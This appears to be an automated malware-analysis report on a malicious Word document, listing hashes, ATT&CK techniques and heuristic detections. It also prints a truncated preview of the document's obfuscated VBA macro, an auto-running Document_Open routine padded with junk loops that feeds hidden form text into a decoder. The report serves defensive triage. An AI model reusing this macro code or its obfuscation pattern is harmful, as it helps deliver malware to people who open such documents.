Office (OOXML) malware analysis — malicious · 5a3aa6c7d9e78ae3

MALICIOUS

Office (OOXML)

108.7 KB Created: 2018-10-26 18:57:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-05-31

MD5: 5b270eccf8907215ad23be4fda16970a SHA-1: 0c69c8f2a388fa2c693ada9978d67aefecf6fbd2 SHA-256: 5a3aa6c7d9e78ae39cfa9db1d013756eda4734e5a2f457c5aafc2268f3efdaed

164 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample is an OOXML document containing a VBA project with a Document_Open macro. This macro utilizes the Shell() function, a critical indicator of malicious activity, to execute arbitrary commands. The obfuscated nature of the VBA code suggests an attempt to conceal the execution of a secondary payload, likely downloaded from an external source.

Heuristics 6

VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
- http://ns.adobe.com/tiff/1.0/In document text (OOXML body / shared strings)
- http://ns.adobe.com/exif/1.0/In document text (OOXML body / shared strings)
- http://www.iec.chIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	13629 bytes
SHA-256: `d1848f9e7590d5e0c71b4f2870bc0333a7ada4e80e0da9b493a023ae4cb716e9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() If 9 < 177 Then ' iTk2Nf Else ' gPaWt5 MsgBox "e0dvUKIVm" End If Dim JaYlESZ6 JaYlESZ6 = 90 While JaYlESZ6 < 587 JaYlESZ6 = JaYlESZ6 + 39 Wend Wo9TzXup = 43341 Urjiz0Xq = Bn9WjNXg & JaYlESZ6 Dim CR7dIkJty CR7dIkJty = 176 While CR7dIkJty <= 956 CR7dIkJty = CR7dIkJty + 32 Wend veLkl8I = "C8wFaXWm" cMEzR = pDiTIlJ & CR7dIkJty Dim Z9EGQerH As Object If 33 < 198 Then ' RLM1Yc Else ' g4psf5vKa Debug.Print "AfqQuy" End If Dim n7fjgWSIo n7fjgWSIo = 141 While n7fjgWSIo < 421 n7fjgWSIo = n7fjgWSIo + 8 Wend alz8xid = "IyC42EAM" Hq4osz = br7QIM1 & n7fjgWSIo Set Z9EGQerH = New frmMain If 30 < 193 Then ' rlJ3rHSa0 Else ' vYx2jc8r MsgBox "xtycA1nl" End If Dim aiHw8ukta aiHw8ukta = 148 While aiHw8ukta <= 473 aiHw8ukta = aiHw8ukta + 34 Wend gRYporX = "ITnegvSrx" wRm1drPq = jj9RS & aiHw8ukta Call Initialize(Z9EGQerH.txtBox.Text) End Sub Attribute VB_Name = "csyrdX0R" Sub Initialize(AFVqU As String) If 59 < 195 Then ' bJ6guWq Else ' zDcwsR Debug.Print "jtfpmMGnq" End If If 59 < 195 Then ' L19gjc7WI Else ' aZvXfc MsgBox "VqoIh1bv" End If If 45 < 166 Then ' x8nZUdiaj Else ' ISak6 Debug.Print "WdwnUXuQ" End If Dim u5zh19 u5zh19 = 40 While u5zh19 <= 387 u5zh19 = u5zh19 + 6 Wend VTvCl = 21007 HAtNj = tWEo3B6zF & u5zh19 If 19 < 161 Then ' FZ7aqf Else ' Tm1xRL MsgBox "DRxm6" End If Dim VJFGBZuiw VJFGBZuiw = 61 While VJFGBZuiw <= 984 VJFGBZuiw = VJFGBZuiw + 7 Wend sydBCtqTU = 28761 O6egK7yAr = FhoStlz & VJFGBZuiw On Error Resume Next Dim NhMGU3r7 NhMGU3r7 = 197 While NhMGU3r7 <= 772 NhMGU3r7 = NhMGU3r7 + 52 Wend q5cxj = "oB4rY" om13t7K9N = JonexAB & NhMGU3r7 If 61 < 174 Then ' clWYVf1Qv Else ' nKvd7 Debug.Print "erHaWGmCb" End If Dim TmpTs0tF4 TmpTs0tF4 = 97 While TmpTs0tF4 <= 467 TmpTs0tF4 = TmpTs0tF4 + 57 Wend jX9ioOJ3E = 7286 wAwY3eb6X = vznQa & TmpTs0tF4 Dim PT9q3 PT9q3 = 97 While PT9q3 <= 467 PT9q3 = PT9q3 + 57 Wend nGWiZs1D = "nlmspBzaM" qN8kHEx = XUdgokvl7 & PT9q3 Dim kfmP2Zr kfmP2Zr = 133 While kfmP2Zr <= 852 kfmP2Zr = kfmP2Zr + 20 Wend xPsOjpCtd = 27846 XDPp87oNm = Ft7EwD & kfmP2Zr If 23 < 210 Then ' N5JyHb Else ' xoPyKWMc Debug.Print "cpkdYf" End If Dim bliaws bliaws = 247 While bliaws < 593 bliaws = bliaws + 20 Wend FVzycMOp1 = 12977 WWoNexF6 = rkENiQfz5 & bliaws Dim ZICcXSZ ZICcXSZ = 247 While ZICcXSZ <= 593 ZICcXSZ = ZICcXSZ + 20 Wend YeQDrLxO = "IfV9zTHG" fyHcXe = EHYtxN3m & ZICcXSZ If 44 < 208 Then ' HzLO9G Else ' VetMK9 Debug.Print "RQa2M9" End If Dim gasnubg gasnubg = 183 While gasnubg < 303 gasnubg = gasnubg + 20 Wend qY6tmbrwP = "yU9bS" Kn8DKsvu = rY9zEO5 & gasnubg Dim iIJzv25B iIJzv25B = 185 While iIJzv25B < 879 iIJzv25B = iIJzv25B + 34 Wend iHvdz8Va = 49726 GEnrs9f = DneRU0pA8 & iIJzv25B Dim qJ0kBs qJ0kBs = 28 While qJ0kBs < 282 qJ0kBs = qJ0kBs + 16 Wend dgSmK = 9620 CejQy3 = NvstR & qJ0kBs If 54 < 150 Then ' F8DiVg1 Else ' uYp45 Debug.Print "EB6pGg" End If If 57 < 182 Then ' in5cjmqQ Else ' LilwV7 Debug.Print "NwajsX2Z" End If Dim XzRH1o XzRH1o = 7 While XzRH1o < 373 XzRH1o = XzRH1o + 48 Wend VHPjY = 35763 CinBqbT = rKXmCqY7 & XzRH1o If 9 < 157 Then ' LjMZ9Q1xA Else ' QjorvPbH MsgBox "VMin8" End If AFVqU = blmY6e1(AFVqU) If 42 < 231 Then ' OFDN6KH5 Else ' eGdxvl MsgBox "eH43t" End If AFVqU = StrConv(AFVqU, vbUnicode) Dim LtwDH8B LtwDH8B = 27 While LtwDH8B < 389 LtwDH8B = LtwDH8B + 59 Wend xowJnUf = 63120 jiFRp = nvJsFUVr & LtwDH8B If 11 < 201 Then ' xs0kgDl Else ' eesYgGwU MsgBox "gWjYGerzl" End If Dim uB5le uB5le = 72 While uB5le <= 848 uB5le = uB5le + 5 Wend XbKRS6 = "nIOJjs" sqmQw = BwMHOLVP & uB5le Dim XHqbk XHqbk = 250 While XHqbk <= 817 XHqbk = XHqbk + 2 Wend lqEjWdmyZ = "y0w4aOoG" TVAb297O ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	52736 bytes
SHA-256: `f0b2cccb10ad8a1b0a0d61d7985c2f13dd388cb3f3da9beb69d8486313524126`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.